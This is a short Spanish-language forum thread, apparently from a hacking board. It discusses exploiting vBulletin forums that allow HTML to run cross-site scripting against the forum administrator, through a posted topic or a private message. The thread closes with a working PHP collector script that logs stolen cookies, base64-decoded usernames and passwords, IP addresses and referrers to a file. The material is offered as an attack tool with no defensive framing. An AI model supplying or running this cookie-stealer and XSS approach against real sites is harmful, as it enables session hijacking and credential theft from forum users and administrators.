Me he podido dar cuenta k en muchos foros vBulletin la opcion de HTML esta on,esto supongo k hace k puedas hacer XSS, no?? posteando un tema y atrayendo al admin del foro hasta el o sino tambien puedes escribirle un privado si esta activado el HTML y cuadno lo lea...listo (no se si esta ultima funcione)
Saludos

En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie
Saludos

<?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>